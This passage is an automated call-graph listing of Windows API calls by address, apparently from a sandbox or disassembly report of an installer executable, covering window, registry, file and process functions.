40598d SendMessageW 3299 405139 3295->3299 3301 401533 91 API calls 3296->3301 3331 401533 3297->3331 3298->3275 3298->3281 3298->3283 3298->3289 3298->3294 3304 40554f 22 API calls 3298->3304 3317 4053df DestroyWindow 3298->3317 3299->3269 3303 405128 3301->3303 3302->3295 3303->3269 3303->3302 3305 4052a2 GetDlgItem 3304->3305 3306 4052c9 ShowWindow KiUserCallbackDispatcher KiUserCallbackDispatcher EnableWindow 3305->3306 3310 4052bd 3305->3310 3306->3310 3307 40531e GetSystemMenu EnableMenuItem SendMessageW 3308 40534b SendMessageW 3307->3308 3307->3310 3308->3310 3310->3306 3310->3307 3326 405538 SendMessageW 3310->3326 3327 405d50 3310->3327 3330 406b40 lstrcpynW 3310->3330 3313 40537d lstrlenW 3314 405ece 21 API calls 3313->3314 3315 405397 SetWindowTextW 3314->3315 3316 401399 91 API calls 3315->3316 3316->3298 3317->3282 3318 4053f9 CreateDialogParamW 3317->3318 3318->3282 3319 40542c 3318->3319 3320 40554f 22 API calls 3319->3320 3321 405437 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3320->3321 3322 401399 91 API calls 3321->3322 3323 40547d 3322->3323 3323->3275 3324 405485 ShowWindow 3323->3324 3325 40551d SendMessageW 3324->3325 3325->3282 3326->3310 3328 405ece 21 API calls 3327->3328 3329 405d5e SetWindowTextW 3328->3329 3329->3310 3330->3313 3332 401399 91 API calls 3331->3332 3333 401547 3332->3333 3333->3302 3845 402048 3846 403002 21 API calls 3845->3846 3847 40204e 3846->3847 3848 403002 21 API calls 3847->3848 3849 402057 3848->3849 3850 402061 ShowWindow 3849->3850 3851 40206c EnableWindow 3849->3851 3852 402ea1 3850->3852 3851->3852 3853 401ecc 3854 403002 21 API calls 3853->3854 3855 401eda SetWindowLongW 3854->3855 3856 402ea1 3855->3856 3359 40234f 3360 40303e 21 API calls 3359->3360 3361 402356 3360->3361 3362 40303e 21 API calls 3361->3362 3363 402361 3362->3363 3364 40303e 21 API calls 3363->3364 3365 40236e 3364->3365 3366 40303e 21 API calls 3365->3366 3367 402379 3366->3367 3368 40303e 21 API calls 3367->3368 3370 402384 3368->3370 3369 4023c4 CoCreateInstance 3374 4023e8 3369->3374 3370->3369 3371 40303e 21 API calls 3370->3371 3371->3369 3372 405d6f 28 API calls 3373 4024ba 3372->3373 3374->3372 3857 404453 GetDlgItem GetDlgItem 3858 4044a7 7 API calls 3857->3858 3865 4046cd 3857->3865 3859 40454a DeleteObject 3858->3859 3860 40453d SendMessageW 3858->3860 3862 404559 3859->3862 3860->3859 3861 404804 3863 404849 3861->3863 3864 4048de 3861->3864 3867 404597 3862->3867 3871 405ece 21 API calls 3862->3871 3868 404933 3863->3868 3875 404868 SendMessageW 3863->3875 3869 404909 3864->3869 3870 4048ed SendMessageW 3864->3870 3865->3861 3866 40475f 3865->3866 3911 40570f SendMessageW 3865->3911 3866->3861 3876 4047ec SendMessageW 3866->3876 3874 40554f 22 API calls 3867->3874 3877 405790 8 API calls 3868->3877 3878 404913 3869->3878 3879 404949 3869->3879 3870->3868 3873 40456f SendMessageW SendMessageW 3871->3873 3873->3862 3880 4045af 3874->3880 3875->3868 3881 404885 SendMessageW 3875->3881 3876->3861 3882 404b5b 3877->3882 3883 404923 3878->3883 3884 40491c ImageList_Destroy 3878->3884 3903 404980 3879->3903 3905 404b12 3879->3905 3916 4054eb 3879->3916 3886 40554f 22 API calls 3880->3886 3889 40489e 3881->3889 3883->3868 3885 40492c GlobalFree 3883->3885 3884->3883 3885->3868 3891 4045bb 3886->3891 3887 404b29 ShowWindow GetDlgItem ShowWindow 3887->3868 3888 40469a GetWindowLongW SetWindowLongW 3890 4046b0 3888->3890 3892 4048b4 SendMessageW 3889->3892 3893 4046c7 3890->3893 3894 4046b7 ShowWindow 3890->3894 3891->3888 3896 404613 SendMessageW 3891->3896 3897 404696 3891->3897 3899 404662 SendMessageW 3891->3899 3900 40464f SendMessageW 3891->3900 3892->3879 3910 405538 SendMessageW 3893->3910 3894->3893 3896->3891 3897->3888 3897->3890 3899->3891 3900->3891 3901 404ac8 3902 404ae4 InvalidateRect 3901->3902 3907 404af3 3901->3907 3902->3907 3904 4049be SendMessageW 3903->3904 3906 4049d8 3903->3906 3904->3906 3905->3868 3905->3887 3906->3901 3909 404a6e SendMessageW SendMessageW 3906->3909 3907->3905 3925 405595 3907->3925 3909->3906 3910->3865 3912 405730 GetMessagePos ScreenToClient SendMessageW 3911->3912 3913 40576e SendMessageW 3911->3913 3914 405766 3912->3914 3915 40576b 3912->3915 3913->3914 3914->3866 3915->3913 3933 406b40 lstrcpynW 3916->3933 3918 4054fe 3934 406645 wsprintfW 3918->3934 3920 405508 3921 401533 91 API calls 3920->3921 3922 405511 3921->3922 3935 406b40 lstrcpynW 3922->3935 3924 405518 3924->3903 3926 4055aa 3925->3926 3927 405ece 21 API calls 3926->3927 3928 405633 3927->3928 3929 405ece 21 API calls 3928->3929 3930 40563f 3929->3930 3931 405ece 21 API calls 3930->3931 3932 40564b lstrlenW wsprintfW SetDlgItemTextW 3931->3932 3932->3905 3933->3918 3934->3920 3935->3924 3936 402dd4 3937 402ddf 3936->3937 3938 403002 21 API calls 3937->3938 3939 402de9 3938->3939 3940 403002 21 API calls 3939->3940 3941 402df2 3940->3941 3391 402656 3392 40303e 21 API calls 3391->3392 3393 40266d 3392->3393 3394 40303e 21 API calls 3393->3394 3395 402678 3394->3395 3410 4062cb 3395->3410 3398 402ea5 3399 4026d1 3402 4026e7 3399->3402 3403 4026d8 3399->3403 3400 4026bb 3401 40303e 21 API calls 3400->3401 3404 4026c2 lstrlenW 3401->3404 3406 402700 RegSetValueExW 3402->3406 3407 403148 39 API calls 3402->3407 3405 403002 21 API calls 3403->3405 3404->3406 3409 4026df 3405->3409 3408 40271c RegCloseKey 3406->3408 3407->3409 3408->3398 3409->3406 3411 4062da 3410->3411 3412 4062e3 RegCreateKeyExW 3411->3412 3413 402697 3411->3413 3412->3413 3413->3398 3413->3399 3413->3400 3414 4036d7 SetErrorMode GetVersionExW 3415 403722 GetVersionExW 3414->3415 3417 403759 3414->3417 3416 403744 3415->3416 3416->3417 3418 4037c0 3417->3418 3419 40690c 5 API calls 3417->3419 3420 4061c4 3 API calls 3418->3420 3419->3418 3421 4037d6 lstrlenA 3420->3421 3421->3418 3422 4037e4 3421->3422 3423 40690c 5 API calls 3422->3423 3424 4037eb 3423->3424 3425 40690c 5 API calls 3424->3425 3426 4037f2 3425->3426 3427 40690c 5 API calls 3426->3427 3428 4037fe #17 OleInitialize SHGetFileInfoW 3427->3428 3502 406b40 lstrcpynW 3428->3502 3431 40384c GetCommandLineW 3503 406b40 lstrcpynW 3431->3503 3433 40385e 3434 40661c CharNextW 3433->3434 3435 403895 CharNextW 3434->3435 3436 40398c GetTempPathW 3435->3436 3446 4038b0 3435->3446 3504 403cda 3436->3504 3438 4039a3 3439 403a12 DeleteFileW 3438->3439 3440 4039a7 GetWindowsDirectoryW lstrcatW 3438->3440 3514 4033c8 GetTickCount GetModuleFileNameW 3439->3514 3441 403cda 12 API calls 3440->3441 3443 4039cb 3441->3443 3443->3439 3447 4039cf GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3443->3447 3444 40661c CharNextW 3444->3446 3445 403a23 3448 403aa6 3445->3448 3450 403a98 3445->3450 3454 40661c CharNextW 3445->3454 3446->3444 3451 403974 3446->3451 3453 403972 3446->3453 3449 403cda 12 API calls 3447->3449 3661 4036ad 3448->3661 3452 403a0a 3449->3452 3542 405a73 3450->3542 3599 406b40 lstrcpynW 3451->3599 3452->3439 3452->3448 3453->3436 3461 403a42 3454->3461 3459 403c41 3462 403c13 ExitProcess 3459->3462 3463 403c4a GetCurrentProcess OpenProcessToken 3459->3463 3460 403c08 3466 406ace MessageBoxIndirectW 3460->3466 3464 403a6c 3461->3464 3465 403aad 3461->3465 3469 403c62 LookupPrivilegeValueW AdjustTokenPrivileges 3463->3469 3470 403c96 3463->3470 3600 40665e 3464->3600 3468 406522 5 API calls 3465->3468 3466->3462 3472 403ab2 lstrlenW 3468->3472 3469->3470 3473 40690c 5 API calls 3470->3473 3617 406b40 lstrcpynW 3472->3617 3476 403c9d 3473->3476 3478 403cb2 ExitWindowsEx 3476->3478 3482 403cbf 3476->3482 3477 403acd 3480 403ae5 3477->3480 3618 406b40 lstrcpynW 3477->3618 3478->3462 3478->3482 3486 403af8 wsprintfW 3480->3486 3500 403b29 3480->3500 3481 403a8d 3616 406b40 lstrcpynW 3481->3616 3485 401533 91 API calls 3482->3485 3485->3462 3487 405ece 21 API calls 3486->3487 3487->3480 3488 405e53 2 API calls 3488->3500 3489 405e73 2 API calls 3489->3500 3490 403b82 SetCurrentDirectoryW 3493 406263 39 API calls 3490->3493 3491 403b39 GetFileAttributesW 3492 403b4f DeleteFileW 3491->3492 3491->3500 3492->3500 3494 403b99 CopyFileW 3493->3494 3494->3448 3494->3500 3496 406263 39 API calls 3496->3500 3497 405ece 21 API calls 3497->3500 3499 403c2e CloseHandle 3499->3448 3500->3448 3500->3480 3500->3486 3500->3488 3500->3489 3500->3490 3500->3491 3500->3496 3500->3497 3500->3499 3501 4065f5 2 API calls 3500->3501 3619 40673f 3500->3619 3658 4066fc CreateProcessW 3500->3658 3501->3500 3502->3431 3503->3433 3505 406d63 5 API calls 3504->3505 3507 403ce6 3505->3507 3506 403cf0 3506->3438 3507->3506 3508 40657c 3 API calls 3507->3508 3509 403cf8 3508->3509 3510 405e53 2 API calls 3509->3510 3511 403cfe 3510->3511 3512 406a7c 2 API calls 3511->3512 3513 403d09 3512->3513 3513->3438 3668 406941 GetFileAttributesW CreateFileW 3514->3668 3516 40340a 3534 403417 3516->3534 3669 406b40 lstrcpynW 3516->3669 3518 40342d 3670 406d36 lstrlenW 3518->3670 3522 40343e GetFileSize 3523 403545 3522->3523 3533 403457 3522->3533 3675 403364 3523->3675 3525 40311b ReadFile 3525->3533 3526 403554 3527 403595 GlobalAlloc 3526->3527 3526->3534 3686 403131 SetFilePointer 3526->3686 3687 403131 SetFilePointer 3527->3687 3528 403613 3530 403364 6 API calls 3528->3530 3530->3534 3532 403571 3536 40696e ReadFile 3532->3536 3533->3523 3533->3525 3533->3528 3533->3534 3537 403364 6 API calls 3533->3537 3534->3445 3535 4035b2 3538 403148 39 API calls 3535->3538 3539 403583 3536->3539 3537->3533 3540 4035c1 3538->3540 3539->3527 3539->3534 3540->3534 3540->3540 3541 4035f1 SetFilePointer 3540->3541 3541->3534 3543 40690c 5 API calls 3542->3543 3544 405a87 3543->3544 3545 405a90 3544->3545 3546 405aa2 3544->3546 3700 406645 wsprintfW 3545->3700 3547 40699d 3 API calls 3546->3547 3548 405ad1 3547->3548 3550 405af0 lstrcatW 3548->3550 3552 40699d 3 API calls 3548->3552 3551 405aa0 3550->3551 3692 4059b4 3551->3692 3552->3550 3555 40665e 18 API calls 3556 405b22 3555->3556 3557 405bbc 3556->3557 3559 40699d 3 API calls 3556->3559 3558 40665e 18 API calls 3557->3558 3560 405bc2 3558->3560 3561 405b55 3559->3561 3562 405bd2 LoadImageW 3560->3562 3563 405ece 21 API calls 3560->3563 3561->3557 3567 405b79 lstrlenW 3561->3567 3571 40661c CharNextW 3561->3571 3564 405c02 RegisterClassW 3562->3564 3565 405c7f 3562->3565 3563->3562 3568 405c36 SystemParametersInfoW CreateWindowExW 3564->3568 3569 405c2f 3564->3569 3566 401533 91 API calls 3565->3566 3570 405c85 3566->3570 3572 405b89 lstrcmpiW 3567->3572 3573 405baf 3567->3573 3568->3565 3569->3448 3570->3569 3578 4059b4 22 API calls 3570->3578 3575 405b74 3571->3575 3572->3573 3576 405b99 GetFileAttributesW 3572->3576 3574 40657c 3 API calls 3573->3574 3579 405bb5 3574->3579 3575->3567 3577 405ba5 3576->3577 3577->3573 3580 406d36 2 API calls 3577->3580 3581 405c92 3578->3581 3701 406b40 lstrcpynW 3579->3701 3580->3573 3583 405d20 3581->3583 3584 405c9e ShowWindow 3581->3584 3585 405899 94 API calls 3583->3585 3586 4061c4 3 API calls 3584->3586 3587 405d26 3585->3587 3588 405cb6 3586->3588 3589 405d44 3587->3589 3590 405d2a 3587->3590 3591 405cc4 GetClassInfoW 3588->3591 3592 4061c4 3 API calls 3588->3592 3593 401533 91 API calls 3589->3593 3590->3569 3596 401533 91 API calls 3590->3596 3594 405cd7 GetClassInfoW RegisterClassW 3591->3594 3595 405ced DialogBoxParamW 3591->3595 3592->3591 3597 405d4b 3593->3597 3594->3595 3598 401533 91 API calls 3595->3598 3596->3569 3597->3597 3598->3569 3599->3453 3703 406b40 lstrcpynW 3600->3703 3602 40666f 3603 406beb 4 API calls 3602->3603 3604 406675 3603->3604 3605 403a7a 3604->3605 3606 406d63 5 API calls 3604->3606 3605->3448 3615 406b40 lstrcpynW 3605->3615 3613 406681 3606->3613 3607 4066b1 lstrlenW 3608 4066bd 3607->3608 3607->3613 3609 40657c 3 API calls 3608->3609 3611 4066c2 GetFileAttributesW 3609->3611 3610 4065f5 2 API calls 3610->3613 3611->3605 3612 4066ce 3611->3612 3612->3605 3613->3605 3613->3607 3613->3610 3614 406d36 2 API calls 3613->3614 3614->3607 3615->3481 3616->3450 3617->3477 3618->3480 3620 40665e 18 API calls 3619->3620 3621 406761 3620->3621 3622 406781 3621->3622 3623 40676a DeleteFileW 3621->3623 3624 4068ef 3622->3624 3637 4068a1 3622->3637 3704 406b40 lstrcpynW 3622->3704 3623->3624 3624->3500 3626 4067a9 3627 4067c1 3626->3627 3628 4067b3 lstrcatW 3626->3628 3631 406d36 2 API calls 3627->3631 3630 4067c7 3628->3630 3629 4065f5 2 API calls 3632 4068be 3629->3632 3633 4067d8 lstrcatW 3630->3633 3635 4067e0 lstrlenW FindFirstFileW 3630->3635 3631->3630 3632->3624 3634 4068c2 3632->3634 3633->3635 3636 40657c 3 API calls 3634->3636 3635->3637 3647 406809 3635->3647 3638 4068c8 3636->3638 3637->3624 3637->3629 3639 4065ab 5 API calls 3638->3639 3640 4068d4 3639->3640 3642 4068f7 3640->3642 3643 4068d8 3640->3643 3641 406883 FindNextFileW 3645 40689a FindClose 3641->3645 3641->3647 3646 405d6f 28 API calls 3642->3646 3643->3624 3648 405d6f 28 API calls 3643->3648 3645->3637 3646->3624 3647->3641 3654 406848 3647->3654 3705 406b40 lstrcpynW 3647->3705 3650 4068e4 3648->3650 3651 406263 39 API calls 3650->3651 3653 4068ed 3651->3653 3652 40673f 63 API calls 3652->3654 3653->3624 3654->3641 3654->3652 3655 405d6f 28 API calls 3654->3655 3656 405d6f 28 API calls 3654->3656 3657 406263 39 API calls 3654->3657 3706 4065ab 3654->3706 3655->3641 3656->3654 3657->3654 3659 40673b 3658->3659 3660 40672f CloseHandle 3658->3660 3659->3500 3660->3659 3662 4036c5 3661->3662 3663 4036b7 CloseHandle 3661->3663 3714 403d48 3662->3714 3663->3662 3666 40673f 70 API calls 3667 4036d6 OleUninitialize 3666->3667 3667->3459 3667->3460 3668->3516 3669->3518 3671 406d45 3670->3671 3672 403433 3671->3672 3673 406d4b CharPrevW 3671->3673 3674 406b40 lstrcpynW 3672->3674 3673->3671 3673->3672 3674->3522 3676 403383 3675->3676 3677 40336b 3675->3677 3680 403394 GetTickCount 3676->3680 3681 40338c 3676->3681 3678 403374 DestroyWindow 3677->3678 3679 40337b 3677->3679 3678->3679 3679->3526 3682 4033a2 CreateDialogParamW ShowWindow 3680->3682 3683 4033c7 3680->3683 3688 406235 3681->3688 3682->3683 3683->3526 3686->3532 3687->3535 3689 406247 PeekMessageW 3688->3689 3690 40623d DispatchMessageW 3689->3690 3691 403393 3689->3691 3690->3689 3691->3526 3693 4059c7 3692->3693 3702 406645 wsprintfW 3693->3702 3695 405a40 3696 405d50 22 API calls 3695->3696 3698 405a45 3696->3698 3697 405a6e 3697->3555 3698->3697 3699 405ece 21 API calls 3698->3699 3699->3698 3700->3551 3701->3557 3702->3695 3703->3602 3704->3626 3705->3647 3707 406bc3 2 API calls 3706->3707 3708 4065b7 3707->3708 3709 4065d9 3708->3709 3710 4065c7 RemoveDirectoryW 3708->3710 3711 4065cf DeleteFileW 3708->3711 3709->3654 3712 4065d5 3710->3712 3711->3712 3712->3709 3713 4065e4 SetFileAttributesW 3712->3713 3713->3709 3715 403d56 3714->3715 3716 4036ca 3715->3716 3717 403d5b FreeLibrary GlobalFree 3715->3717 3716->3666 3717->3716 3717->3717 3942 402e5b 3946 406b40 lstrcpynW 3942->3946 3944 402e66 CoTaskMemFree 3945 402ea1 3944->3945 3946->3944 3760 40225d 3761 40226e 3760->3761 3772 402335 3760->3772 3762 40303e 21 API calls 3761->3762 3764 402275 3762->3764 3763 405d6f 28 API calls 3766 40234a 3763->3766 3765 40303e 21 API calls 3764->3765 3767 402281 3765->3767 3768 40228b GetModuleHandleW 3767->3768 3769 40229c LoadLibraryExW 3767->3769 3770 4022b0 3768->3770 3771 402298 3768->3771 3769->3770 3769->3772 3781 40628f 3770->3781 3771->3769 3772->3763 3775 4022c4 3778 405d6f 28 API calls 3775->3778 3779 4022da 3775->3779 3776 402306 3777 405d6f 28 API calls 3776->3777 3777->3779 3778->3779 3779->3766 3780 402329 FreeLibrary 3779->3780 3780->3766 3786 40648f WideCharToMultiByte 3781->3786 3783 4062ac 3784 4062b3 GetProcAddress 3783->3784 3785 4022ba 3783->3785 3784->3785 3785->3775 3785->3776 3786->3783 3947 402cde 3948 403002 21 API calls 3947->3948 3950 402b21 3948->3950 3949 402d10 3951 402d35 3949->3951 3952 402d25 3949->3952 3950->3947 3950->3949 3955 401709 3950->3955 3954 405ece 21 API calls 3951->3954 3953 403002 21 API calls 3952->3953 3953->3955 3954->3955 3956 40285f 3957 402883 3956->3957 3958 402899 3956->3958 3959 403002 21 API calls 3957->3959 3960 4028c3 3958->3960 3961 40289e 3958->3961 3963 402889 3959->3963 3962 40303e 21 API calls 3960->3962 3964 40303e 21 API calls 3961->3964 3965 4028ca lstrlenW 3962->3965 3968 402910 3963->3968 3970 4028fc 3963->3970 3974 4064aa SetFilePointer 3963->3974 3966 4028a5 3964->3966 3965->3963 3973 40648f WideCharToMultiByte 3966->3973 3969 4028b5 lstrlenA 3969->3963 3970->3968 3971 406a31 WriteFile 3970->3971 3971->3968 3973->3969 3975 4064c6 3974->3975 3982 4064e1 3974->3982 3976 40696e ReadFile 3975->3976 3977 4064d2 3976->3977 3978 406512 SetFilePointer 3977->3978 3979 4064ea SetFilePointer 3977->3979 3977->3982 3978->3982 3979->3978 3980 4064f5 3979->3980 3981 406a31 WriteFile 3980->3981 3981->3982 3982->3970 3983 401ce0 3984 40303e 21 API calls 3983->3984 3985 401ce7 3984->3985 3986 403002 21 API calls 3985->3986 3987 401cf0 wsprintfW 3986->3987 3988 402ea1 3987->3988 2919 404b65 2920 404b82 GetDlgItem GetDlgItem GetDlgItem 2919->2920 2921 404d0e 2919->2921 2965 405538 SendMessageW 2920->2965 2923 404d16 GetDlgItem CreateThread FindCloseChangeNotification 2921->2923 2924 404d5a 2921->2924 2926 404d42 2923->2926 2999 405899 OleInitialize 2923->2999 2927 404d62 2924->2927 2928 404d8b 2924->2928 2925 404bfb 2935 404c02 GetClientRect GetSystemMetrics SendMessageW SendMessageW 2925->2935 2970 405790 2926->2970 2927->2926 2932 404d6e ShowWindow ShowWindow 2927->2932 2929 404d93 2928->2929 2930 404dd9 2928->2930 2933 404d9c 2929->2933 2934 404daf ShowWindow 2929->2934 2930->2926 2941 404dec SendMessageW 2930->2941 2984 405538 SendMessageW 2932->2984 2985 40598d 2933->2985 2934->2933 2938 404dc6 2934->2938 2939 404c52 SendMessageW SendMessageW 2935->2939 2940 404c66 2935->2940 2936 404d50 2988 405d6f 2938->2988 2939->2940 2945 404c78 2940->2945 2946 404c6e SendMessageW 2940->2946 2941->2936 2947 404e0a CreatePopupMenu 2941->2947 2942 404d89 2942->2926 2966 40554f 2945->2966 2946->2945 2949 405ece 21 API calls 2947->2949 2951 404e1c AppendMenuW 2949->2951 2950 404c8a 2952 404c93 ShowWindow 2950->2952 2953 404cc5 GetDlgItem SendMessageW 2950->2953 2954 404e52 TrackPopupMenu 2951->2954 2955 404e3e GetWindowRect 2951->2955 2958 404cb4 2952->2958 2959 404ca9 ShowWindow 2952->2959 2953->2936 2957 404cf1 SendMessageW SendMessageW 2953->2957 2954->2936 2956 404e74 2954->2956 2955->2954 2960 404e88 SendMessageW 2956->2960 2957->2936 2969 405538 SendMessageW 2958->2969 2959->2958 2960->2960 2962 404ea4 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 2960->2962 2963 404ed0 SendMessageW 2962->2963 2963->2963 2964 404efe GlobalUnlock SetClipboardData CloseClipboard 2963->2964 2964->2936 2965->2925 2967 405ece 21 API calls 2966->2967 2968 40555a SetDlgItemTextW 2967->2968 2968->2950 2969->2953 2971 4057a8 GetWindowLongW 2970->2971 2972 40585e 2970->2972 2971->2972 2973 4057bd 2971->2973 2972->2936 2973->2972 2974 4057f1 2973->2974 2975 4057e5 GetSysColor 2973->2975 2976 4057f5 SetTextColor 2974->2976 2977 4057ff SetBkMode 2974->2977 2975->2974 2976->2977 2978 405827 2977->2978 2979 405818 GetSysColor 2977->2979 2980 405838 2978->2980 2981 40582b SetBkColor 2978->2981 2979->2978 2980->2972 2982 405851 CreateBrushIndirect 2980->2982 2983 405848 DeleteObject 2980->2983 2981->2980 2982->2972 2983->2982 2984->2942 2986 405994 2985->2986 2987 40599a SendMessageW 2985->2987 2986->2987 2987->2942 2989 405d81 2988->2989 2995 405e37 2988->2995 2990 405da0 lstrlenW 2989->2990 2991 405ece 21 API calls 2989->2991 2992 405db2 lstrlenW 2990->2992 2993 405dd5 2990->2993 2991->2990 2994 405dc7 lstrcatW 2992->2994 2992->2995 2996 405dec 2993->2996 2997 405ddf SetWindowTextW 2993->2997 2994->2993 2995->2933 2996->2995 2998 405df1 SendMessageW SendMessageW SendMessageW 2996->2998 2997->2996 2998->2995 3006 40551d 2999->3006 3001 4058bc 3005 4058e3 3001->3005 3009 401399 3001->3009 3002 40551d SendMessageW 3003 4058f5 OleUninitialize 3002->3003 3005->3002 3007 405535 3006->3007 3008 405526 SendMessageW 3006->3008 3007->3001 3008->3007 3010 401413 3009->3010 3012 4013a3 3009->3012 3010->3001 3012->3010 3013 4013df MulDiv SendMessageW 3012->3013 3014 40154a 3012->3014 3013->3012 3015 4015c3 3014->3015 3108 4015ce 3014->3108 3016 4016c1 3015->3016 3017 4017c2 3015->3017 3018 4015e6 3015->3018 3019 4018cb 3015->3019 3020 4016ef 3015->3020 3021 4016af 3015->3021 3022 40182f 3015->3022 3023 401711 3015->3023 3024 401633 SetForegroundWindow 3015->3024 3025 4017d3 3015->3025 3026 4015d5 3015->3026 3027 401618 3015->3027 3028 4015f9 3015->3028 3029 40189b 3015->3029 3030 4018de 3015->3030 3031 40163f 3015->3031 3076 40160c 3015->3076 3015->3108 3038 4016d1 ShowWindow 3016->3038 3039 4016d9 3016->3039 3042 40303e 21 API calls 3017->3042 3041 4015f0 PostQuitMessage 3018->3041 3018->3108 3033 40303e 21 API calls 3019->3033 3125 40303e 3020->3125 3175 406645 wsprintfW 3021->3175 3036 40303e 21 API calls 3022->3036 3043 40303e 21 API calls 3023->3043 3024->3108 3032 40303e 21 API calls 3025->3032 3052 405d6f 28 API calls 3026->3052 3026->3108 3172 403002 3027->3172 3061 401399 74 API calls 3028->3061 3044 40303e 21 API calls 3029->3044 3035 40303e 21 API calls 3030->3035 3059 403002 21 API calls 3031->3059 3031->3108 3047 4017da 3032->3047 3048 4018d2 3033->3048 3063 4018e5 3035->3063 3050 401835 GetFullPathNameW 3036->3050 3038->3039 3051 4016e6 ShowWindow 3039->3051 3039->3108 3041->3108 3054 4017c8 3042->3054 3055 401718 3043->3055 3045 4018a2 SearchPathW 3044->3045 3045->3108 3046 405d6f 28 API calls 3046->3108 3057 40303e 21 API calls 3047->3057 3143 406a7c 3048->3143 3049 40161e Sleep 3049->3108 3064 40184d 3050->3064 3065 401857 3050->3065 3051->3108 3052->3108 3179 4065f5 FindFirstFileW 3054->3179 3130 406beb CharNextW CharNextW 3055->3130 3062 4017e3 3057->3062 3059->3108 3061->3108 3067 40303e 21 API calls 3062->3067 3068 401906 3063->3068 3069 40190e 3063->3069 3070 401889 GetShortPathNameW 3064->3070 3064->3108 3065->3064 3077 4065f5 2 API calls 3065->3077 3066 401780 3075 401790 3066->3075 3066->3076 3072 4017ec MoveFileW 3067->3072 3187 406b40 lstrcpynW 3068->3187 3188 406b40 lstrcpynW 3069->3188 3070->3108 3071 40661c CharNextW 3094 401720 3071->3094 3078 401804 3072->3078 3079 4017f8 3072->3079 3082 405d6f 28 API calls 3075->3082 3076->3046 3083 40186a 3077->3083 3086 4065f5 2 API calls 3078->3086 3078->3108 3079->3076 3080 40190c 3089 406d63 5 API calls 3080->3089 3081 401919 3189 40657c lstrlenW CharPrevW 3081->3189 3085 401797 3082->3085 3083->3064 3186 406b40 lstrcpynW 3083->3186 3142 406b40 lstrcpynW 3085->3142 3093 401814 3086->3093 3114 40192b 3089->3114 3093->3108 3182 406263 MoveFileExW 3093->3182 3094->3066 3094->3071 3097 401769 GetFileAttributesW 3094->3097 3136 406522 3094->3136 3139 405e73 CreateDirectoryW 3094->3139 3176 405e53 CreateDirectoryW 3094->3176 3095 4017a2 SetCurrentDirectoryW 3095->3108 3097->3094 3099 4065f5 2 API calls 3099->3114 3102 40193f CompareFileTime 3102->3114 3103 401a18 3105 405d6f 28 API calls 3103->3105 3104 4019fd 3106 405d6f 28 API calls 3104->3106 3107 401a24 3105->3107 3106->3108 3151 403148 3107->3151 3108->3012 3111 401a52 SetFileTime 3113 401a60 FindCloseChangeNotification 3111->3113 3112 405ece 21 API calls 3112->3114 3113->3108 3115 401a73 3113->3115 3114->3026 3114->3099 3114->3102 3114->3103 3114->3104 3114->3112 3116 406b40 lstrcpynW 3114->3116 3147 406bc3 GetFileAttributesW 3114->3147 3150 406941 GetFileAttributesW CreateFileW 3114->3150 3192 406ace 3114->3192 3117 401a78 3115->3117 3118 401a89 3115->3118 3116->3114 3120 405ece 21 API calls 3117->3120 3119 405ece 21 API calls 3118->3119 3122 401a91 3119->3122 3121 401a80 lstrcatW 3120->3121 3121->3122 3124 406ace MessageBoxIndirectW 3122->3124 3124->3108 3126 405ece 21 API calls 3125->3126 3127 403067 3126->3127 3128 4016f6 SetFileAttributesW 3127->3128 3129 406d63 5 API calls 3127->3129 3128->3108 3129->3128 3131 406c09 3130->3131 3135 406c40 3130->3135 3132 406c18 CharNextW 3131->3132 3133 406c1d 3131->3133 3132->3135 3134 40661c CharNextW 3133->3134 3133->3135 3134->3133 3135->3094 3137 40690c 5 API calls 3136->3137 3138 406529 3137->3138 3138->3094 3140 405ec7 3139->3140 3141 405ebf GetLastError 3139->3141 3140->3094 3141->3140 3142->3095 3144 406a89 GetTickCount GetTempFileNameW 3143->3144 3145 406ac1 3144->3145 3146 406abd 3144->3146 3145->3108 3146->3144 3146->3145 3148 406be5 3147->3148 3149 406bd5 SetFileAttributesW 3147->3149 3148->3114 3149->3148 3150->3114 3152 403190 3151->3152 3153 403183 3151->3153 3196 40696e ReadFile 3152->3196 3211 403131 SetFilePointer 3153->3211 3157 4032f6 3159 40333d 3157->3159 3164 4032fa 3157->3164 3158 4031b6 GetTickCount 3170 4031ca 3158->3170 3160 40311b ReadFile 3159->3160 3166 401a3a 3160->3166 3161 40311b ReadFile 3161->3164 3163 406a31 WriteFile 3163->3164 3164->3161 3164->3163 3164->3166 3166->3111 3166->3113 3167 40323a GetTickCount 3167->3170 3168 40326b MulDiv wsprintfW 3169 405d6f 28 API calls 3168->3169 3169->3170 3170->3166 3170->3167 3170->3168 3198 40311b 3170->3198 3201 406ece 3170->3201 3209 406a31 WriteFile 3170->3209 3173 405ece 21 API calls 3172->3173 3174 403016 3173->3174 3174->3049 3175->3108 3177 405e65 GetLastError 3176->3177 3178 405e6d 3176->3178 3177->3178 3178->3094 3180 406616 3179->3180 3181 40660b FindClose 3179->3181 3180->3108 3181->3180 3183 406277 3182->3183 3185 406284 3182->3185 3212 40632c 3183->3212 3185->3079 3186->3064 3187->3080 3188->3081 3190 40191f lstrcatW 3189->3190 3191 406599 lstrcatW 3189->3191 3190->3080 3191->3190 3193 406ae3 3192->3193 3194 406b31 3193->3194 3195 406af9 MessageBoxIndirectW 3193->3195 3194->3114 3195->3194 3197 4031a2 3196->3197 3197->3157 3197->3158 3197->3166 3199 40696e ReadFile 3198->3199 3200 40312e 3199->3200 3200->3170 3202 406ef1 3201->3202 3203 406ef9 3201->3203 3202->3170 3203->3202 3204 407034 3203->3204 3205 407010 GlobalFree 3203->3205 3206 40701a GlobalAlloc 3203->3206 3204->3202 3207 4070a0 GlobalFree 3204->3207 3208 4070a7 GlobalAlloc 3204->3208 3205->3206 3206->3202 3206->3204 3207->3208 3208->3202 3210 406a52 3209->3210 3210->3170 3211->3152 3213 406382 GetShortPathNameW 3212->3213 3214 40635c 3212->3214 3216 406462 3213->3216 3217 406397 3213->3217 3239 406941 GetFileAttributesW CreateFileW 3214->3239 3216->3185 3217->3216 3219 40639f wsprintfA 3217->3219 3218 406366 CloseHandle GetShortPathNameW 3218->3216 3221 40637a 3218->3221 3220 405ece 21 API calls 3219->3220 3222 4063c8 3220->3222 3221->3213 3221->3216 3240 406941 GetFileAttributesW CreateFileW 3222->3240 3224 4063d5 3224->3216 3225 4063e0 GetFileSize GlobalAlloc 3224->3225 3226 40645b CloseHandle 3225->3226 3227 4063ff 3225->3227 3226->3216 3228 40696e ReadFile 3227->3228 3229 406407 3228->3229 3229->3226 3241 406b5c lstrlenA lstrlenA 3229->3241 3232 